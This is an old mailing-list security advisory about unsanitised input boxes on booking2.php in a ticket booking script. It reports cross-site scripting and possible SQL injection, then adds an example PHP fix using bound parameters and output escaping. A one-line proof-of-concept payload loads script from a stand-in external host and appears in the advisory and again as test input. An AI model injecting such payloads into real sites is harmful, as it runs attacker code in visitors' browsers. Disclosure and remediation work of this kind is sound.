Message-ID: <20060609050404.1820.qmail@securityfocus.com>
Date: 9 Jun 2006 05:04:04 -0000
From: luny@...fucktard.com
To: bugtraq@...urityfocus.com
Subject: mole.com.ua Ticket Booking Script - XSS

Ticket Booking Script

Homepage:
http://www.mole.com.ua

Affected files:
input boxes on booking2.php

XSS Vulnerabilities:

The input boxes on booking2.php do not sanitize user input before generating it and then submitting it to a MySQL db. This can cause XSS examples as well as possible SQL injections.

For PoC just put <SCRIPT SRC=http://www.evilsite.com/xss.js></SCRIPT> in any of the input boxes
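
The two defects reported for booking2.php, handled in one place: an added example that is not part of the original post or the vendor's code. The table and field names (bookings, name, email) are hypothetical, and an in-memory SQLite database stands in for MySQL so the script runs offline.

```php
<?php
declare(strict_types=1);
// Added example, not the vendor's code; bookings/name/email are hypothetical.

// Escape a value for an HTML text or quoted-attribute context.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Bound parameters keep submitted text as data, never as part of the SQL.
function save_booking(PDO $pdo, array $post): int
{
    $name  = trim((string)($post['name'] ?? ''));
    $email = trim((string)($post['email'] ?? ''));
    if ($name === '' || strlen($name) > 100) {
        throw new InvalidArgumentException('invalid name');
    }
    if (filter_var($email, FILTER_VALIDATE_EMAIL) === false) {
        throw new InvalidArgumentException('invalid email');
    }
    $stmt = $pdo->prepare('INSERT INTO bookings (name, email) VALUES (:name, :email)');
    $stmt->execute([':name' => $name, ':email' => $email]);
    return (int)$pdo->lastInsertId();
}

// Every stored value is encoded at output time, whatever was accepted on input.
function render_booking(PDO $pdo, int $id): string
{
    $stmt = $pdo->prepare('SELECT name, email FROM bookings WHERE id = :id');
    $stmt->execute([':id' => $id]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false) {
        return '<p>Booking not found.</p>';
    }
    return '<p>Name: ' . h($row['name']) . '</p><p>E-mail: ' . h($row['email']) . '</p>';
}

// In-memory SQLite stands in for the MySQL database (assumption for the demo).
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE bookings (id INTEGER PRIMARY KEY, name TEXT, email TEXT)');

// Constructed input: the PoC string from the advisory placed in one field.
$id = save_booking($pdo, [
    'name'  => '<SCRIPT SRC=http://www.evilsite.com/xss.js></SCRIPT>',
    'email' => 'visitor@example.com',
]);
echo render_booking($pdo, $id), "\n";
```

The string is stored unchanged and only encoded when rendered, so the page shows it as text instead of loading the external script.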